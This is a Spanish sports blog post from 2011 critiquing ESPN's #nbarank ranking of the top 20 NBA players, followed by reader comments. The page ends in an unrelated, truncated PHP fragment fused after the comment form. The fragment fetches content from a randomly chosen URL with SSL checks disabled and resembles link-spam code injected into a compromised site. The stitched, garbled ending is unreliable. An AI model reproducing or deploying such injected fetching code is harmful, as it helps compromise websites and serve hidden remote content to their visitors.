Comentarios al #nbarank de la ESPN

21 de October de 2011 por TheDeerHunter

Las últimas semanas la ESPN ha aprovechado el lockout para presentarnos uno de esos rankings de jugadores que tanto revuelo generan. La premisa era promediar entre 91 colaboradores una calificación del 0 al 10 en términos de calidad vigente para cada jugador y presentar nada menos que los 500 mejores de la liga con la dificultad y la polémica correspondiente.

No creáis que nosotros estamos tan sumamente sonados para emularles. Ya aprendimos la lección cuando nos sacamos de la manga aquella lista de los 50 mejores jugadores de la historia. Nos limitamos esta vez a criticar desde la barrera ese ajeno ejercicio sin piedad, que suele ser mucho más fácil y agradecido.

Nos limitaremos a repasar los principales, siempre desde el más puro subjetivismo.

#1 LeBron James (9.91) Tras su fiasco en la final muchos podrían encontrar motivo para hacer sangre de la elección. Sin embargo opino que, alejándose de animadversiones diversas, cualquiera en su sano juicio aseguraría elijiéndole como nº1 de cualquier fantasy draft. Muchos le consideran el verdadero MVP de la temporada pasada. La elección es justa.

#2 Dwight Howard (9.82) Es una fuerza defensiva de primera magnitud aunque muchos le reprochan mayores prestaciones ofensivas. Para mí es lo que es a pesar de Van Gundy y creo que pronto estará considerado como uno de los mejores centers de la historia. La elección es justa.

#3 Dwayne Wade (9.72) No es que ponga en duda que por talento y cualidades Wade pueda discutirle a cualquiera el top5 de la liga en condiciones normales, como tampoco se puede reprochar nada acerca de su rendimiento y el de su equipo la temporada pasada. Sin embargo no puedo evitar sentir un poso decepcionante en su actual papel en la liga. Para mí en ningún caso es el top 3 y tendría que meditar si merece un top 5.

#4 Chris Paul (9.68) Gran temporada y mejores playoffs para uno de los más excelentes bases que yo haya visto. Y sin embargo no se me ocurre ni un sólo argumento para ponerle por encima de Dirk o Durant este año y eso siendo generoso… Tampoco podría bajarle del top 10.

#5 Dirk Nowitzki (9.67) Con todo lo logrado a él le importará un bledo su lugar en esta lista. Sin embargo no hay anillo que alcance a reflejar todo lo bueno que nos dió la temporada pasada. Para mí es top3 indiscutible del pasado curso.

#6 Kevin Durant (9.62) El anotador perfecto. El arma ofensiva más excepcional de la actualidad… ¿qué se le puede reprochar? Quizás su sutil estancamiento del año pasado a este nos dejara un punto fríos. Se le exije como a un mito y así debe ser, pero cuesta dijerir que alguien crea que no es un top5.

#7 Kobe Bryant (9.40) La red se incendió el día que se hacía pública esta posición. Puede que merezca cierto castigo por el cursito que nos han brindado los amarillos, pero tanto como para caer del top 5… En condiciones normales habría que cuestionarse quién le puede discutir ser el mejor jugador del mundo.

#8 Derrick Rose (9.27) Rose no pudo quitarse el tufillo a bacalá de su premio MVP con una actuación un punto decepcionante en postemporada. Lanzamos esta reflexión ¿Hay mucha gente que cree realmente que es el mejor jugador de la liga? ¿siquiera entre los 5 mejores? Creo que la elección es esencialmente justa, puesto arriba o abajo.

#9 Deron Williams (8.98) Más de 20 puntos y 10 asistencias para el que mucha gente considera como el base más potente de la liga. Sin ánimo de hacer sangre extradeportivamente para mí no fue una campaña brillante por su parte. Más allá de sus incontestables números ¿qué es lo que realmente nos ofreció el curso pasado? Problemas en los Jazz y final intrascendente en los Nets. Sin postemporada no creo que merezca el top 10.

#10 Blake Griffin (8.78) No discuto sus méritos ni su sensacional campaña. Pero ¿Es Blake Griffin el segundo mejor 4 de la liga hoy por hoy? Me parece ridículo. Columpiada padre.

#11 Pau Gasol (8.53) Con el final de curso que se marcó da pereza valorar sus méritos. Tampoco conviene olvidar que lo que es para él una temporada discreta significa un 19 puntos, 10 rebotes, 3 asistencias y 2 robos. No merece un top 10 este año, pero tampoco quedar por debajo de alguno de los de arriba. Ignorando lo de alrededor puede ser una posición justa.

#12 Carmelo Anthony (8.42) Temporada de cambio para Melo con todo lo que conlleva. Por cualidades resulta difícil pensar en 10 nombres claramente superiores a él, pero en demasiadas ocasiones queda poso de desperdicio de talento y de individualismo mal llevado. La trayectoria final de los Knicks no le beneficia. Un top15 para él parece excesivo premio.

#13 Amare Stoudemire (8.39) Cerrando bocas y devolviendo la dignidad a una parroquia tan maltratada como la del Madison. Tendrá sus lagunas defensivas y un historial problemático de lesiones, pero ha demostrado que no necesita a Nash para permanecer en la élite de la liga y también ser capaz de liderar un proyecto. Como mínimo debería de estar por encima de Melo y si me apuras aspirar a ser uno de los 10 hombres más destacados del pasado curso.

#14 Steve Nash (8.33) Todos simpatizamos con el infinito talento del canadiense y más ahora que es uno de los viejos rockeros que quedan sin anillo. Nash es como los buenos vinos y ha envejecido estupendamente… pero aquí no se valora el currículum y en su declive efectivo y sin playoffs no hace falta bajar mucho la vista en el ranking para comprobar hasta qué punto se le mima. Para mí hoy ya no es un top 15 por mucho que me duela.

#15 Russell Westbrook (8.24) Teniendo en cuenta que sus números son casi calcados a los del MVP Rose y que durante algunas fases de la temporada ha sido más líder que el propio Durantula no hace falta ser muy lince para observar que se le ha castigado con cierta dureza por su discreta dirección en la final de conferencia. Siendo justos su lugar estaría como mínimo un par de puestos más arriba. Con 22 añitos y puliendo ciertas cuestiones no debería extrañarnos verle pronto siendo uno de los 10 mejores de la liga.

#16 Kevin Love (8.20) De forma similar a Griffin, ambos nos deslumbraron el pasado curso hasta el punto de situarlos sin dudar entre las super-estrellas consagradas (¡o incluso por encima!) Sin embargo, como mínimo, todavía habría que verles en la hora de la verdad para evitar caer en este absurdo delirio colectivo.

#17 Rajon Rondo (8.19) En ocasiones nos deslumbra pero en otras nos desespera. Nadie duda de su capacidad en la dirección, la defensa o el rebote pero mientras no mejore su ridículo lanzamiento no creo que pueda ser considerado un top20 de la liga.

#18 Manu Ginobili (8.16) No es exagerado calificarle como el segundo mejor escolta del oeste el pasado curso. La salud de Manudo es la verdadera causa de la gran regular de los Spurs. Me parece muy acertado colocarle en este puesto.

#19 Tim Duncan (8.16) Está bien reconocer un trabajo más oscuro y eficaz del mejor 4 de todos los tiempos… siempre que eso no suponga agravios comparativos como los que tienen lugar en este ranking. El tiempo pasa y cualquier tiempo pasado fue mejor para Duncan. Uno de los más mimados del pasado curso. Siempre fue demasiado listo como para creerse que sigue estando entre los 20 mejores jugadores de la liga. Tengo mis dudas de que pudiera defender el top25.

#20 Zach Randolph (8.12) El gran maltratado del ranking. Su rendimiento particular y el de la campaña histórica de los Grizzlies le colocan claramente en el top10.

En fin, aquí lo dejamos. ¿Os atreveríais a votar un #tjranking más completo?

Comenta

17 comentarios a esta entrada

  1. Pablete dice:
    #1

    Por favor, Kobe es mejor que Wade con un brazo atado

      Citar

  2. otropablo dice:
    #2

    El publico quiere un tjnbarank!!!
    La verdad es que hubiera metido al final de la lista (el 18 o así) a Lamarcus aldridge, que Blake G. esté en esta lista me parece un poco ridiculo, Kevin Love, sólo por hacer un 30 – 30 esta temporada me parece correcto su lugar. Y Melo le pondría aun más abajo, no ha dado la talla de super estrella que se le supone.
    Por lo demás estoy muy de acuerdo en casi todos los comentarios.A lo mejor hubiera metido a Ray Allen por ahí también… aunque está complicado.

    Saludos y me repito: El publico quiere un tjnbarank!

      Citar

  3. laker16 dice:
    #3

    Por lo que leo veo que la poscion de 1 y de 4 son las que mas polemica levantan, probablemente se deba en parte a que son las que cuentan con mas representacion. Solo con ver este ranking y sin entrar en valoraciones sobre la posicion que ocupa cada jugador, veo que la posicion mas competitiva de cara al futuro y prometedora de la liga es la de base.

      Citar

  4. dsromero dice:
    #4

    Para mi el TOP3 serian Lebron, Kobe y Dirk …. pero no se como los ordenaría, supongo que depende de como me levantara ese día le tocaría a uno o a otro.

    el Top5 lo completaría con Howard y Durant

    y en el Top10 dejaría a Wade, Paul, Rose …. y otros tres entre un grupos que tendría que liarse a leches para poder decidirme

      Citar

  5. GreenPride dice:
    #5

    Pues para mí están demasiado abajo Westbrook, Amare y Dirk y grandísimas injusticias con Randolph y Kobe (¿Alguien si tuviera que hacer su equipo lo ficharía en 7º lugar en serio?) Creo que demasiado arriba Pau, Griffin, Melo y quizás Wade y Deron.
    Siempre es muy difícil hacer estos rankings y es tirarse un poco a la piscina. Si nos referimos a rendimiento la temporada pasada para mí el top3 ahora mismo sería:
    1. LeBron (a pesar de sus finales)
    2. Kobe (a pesar de sus playoffs)
    3. Dirk (precisamente por sus finales y sus playoffs)
    Y llamándo a la puerta muy fuertemente Durantula. Si hay temporada este año creo que aspirará a MVP

      Citar

  6. Sancho88 dice:
    #6

    Mi top 3 sería para Lebron, Nowitzki y Bryant, por este orden. Completan mi top 5 Kevin Durant y Chris Paul (a mí me encanta). Después, habría que premiar casi diez puestos más a Randolph, incluir a Marc Gasol en esa lista, y si tantos halagos para Chicago… Noah o Boozer podrían estar, aunque tampoco es un pecado no incluirsles, tampoco está Aldridge, que es un crack. y no pasa nada. Han castigado a Bryant, que no sea top 5 tiene delito. Y con todos mis respetos, ni Manu ni Duncan deberían estar entre los 20 mejores jugadores de la liga.

      Citar

  7. laker16 dice:
    #7

    A mi juicio la cosa tendrai que ir asi:

    1-Nowitzki (En Playoffs se paseo con sus Mavs hasta llegar a la final y su actuacion en la misma fue colosal)
    2-LeBron (De menos a mas hasta completar una gran campaña, finalmente no pudo con Dirk)
    3- Rose (Lo que ha hecho con los Bulls tiene merito, mejor equipo de la RS)
    4-Durant (Esta maquina anotadora a liderado a sus jovenes Thunder a las finales del oeste, probablemente el jugador del futuro junto con Rose)
    5-Randolph (Numeros de escandolo, sus Grizzlies se ventilaron a los Spurs en 1ª ronda del oeste y este monstruo tuvo mucho que ver)
    6-Bryant (Temporada normalilla y peores Playoffs para el que probablemente sea el mejor jugador del mundo)
    7-Howard (Buena temporada del mejor center actual, pero la vuelta a casa fue demasiado pronto)
    8-Paul (Gran temporada y Playoffs de este gran base)
    9-Stoudemire (Ha hecho regresar a los Knicks a la elite)
    10-Wade (Buena temporada de este crack, aunque algo irregular, cada dia que pasa tengo mas claro que se ha convertido en el escudero de James)
    11-Westbrook (Numeros impresionantes para otro de los jugadores del futuro)
    12-Rondo (En ciertas facetas es un jugador extraordinario, mientras que en otras es todo lo contrario)
    13-Anthony (Buenos numeros individuales, pero su llegada al equipo no acabo de darle el salto de calidad que se le suponia y en Playoffs estuvieron de paso)
    14-Love (Actuaciones antologicas como las de antes)
    15-Griffin (Grandes numeros de este “Rookie”)
    16-Gasol (Buenos numeros, aunque de mas a menos)
    17-Williams (Grandisimo base con buenos numeros, aunque poco determinante en su equipo)
    18-Ginobili (Gran RS de los Spurs de la mano de Manudo)
    19-Duncan (Buena temporada y punto, los años no pasan en valde ni para uno de los mejores de la historia)
    20-Nash (No ha hecho mas meritos que ninguno de los que tiene delante, pero si menos)

      Citar

  8. laker16 dice:
    #8

    Tengo que decir que me he limitado a ordenar los nombres de la lista. No por ello creo que estos 20 han sido los mejores de la pasada temporada

      Citar

  9. JHC dice:
    #9

    buenas creo k deberiais krear un post aki en la pagina sobre la liga hoops creada a ver si asin se anima mas gente

      Citar

  10. laker16 dice:
    #10

    El que mas me cuesta colocar es Bryant. Creo que por potencial es el mejor jugador del mundo, pero esta pasada temporada no me ha acabado de convencer teniendo en cuenta su calidad. Y el que podria haber colocado mas arriba es Westbrook, pero tampoco se por quien.

      Citar

  11. TheDeerHunter dice:
    #11

    JHC:
    buenas creo k deberiais krear un post aki en la pagina sobre la liga hoops creada a ver si asin se anima mas gente

    cuando veamos el final del tunel del lockout le daremos un apretón a eso

      Citar

  12. Sancho88 dice:
    #12

    No podréis con Palencia Urogallos, jeje. tíos, hay monazo de nba, esto de la euroliga es una bacalá, por muchos Kirilenkos y Rudys

      Citar

  13. Blade Petrovic dice:
    #13

    yo me animo. aun me puedo registar?

      Citar

  14. TheDeerHunter dice:
    #14

    Blade Petrovic:
    yo me animo. aun me puedo registar?

    de momento hay sitio de sobra

      Citar

  15. Mryeze dice:
    #15

    Esta bien la lista pero antes que a algunos hubiera incluido a Pierce que aunque este rondo sigue siendo el verdadero lider celtic

      Citar

  16. Txusma dice:
    #16

    Con Pierce, Garnett y Allen en el equipo es imposible que Rondo sea el líder. Que sea el que mayor producción estadística aporta, no lo ponto en duda, pero de ahí a ser líder va un trecho grande.

      Citar

  17. javiviver dice:
    #17

    Creeis que melo puede llegar a ser top 3 o top 5
    Com puedo ver partidos de la nba yo de momento solo veo resumenes por la web

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>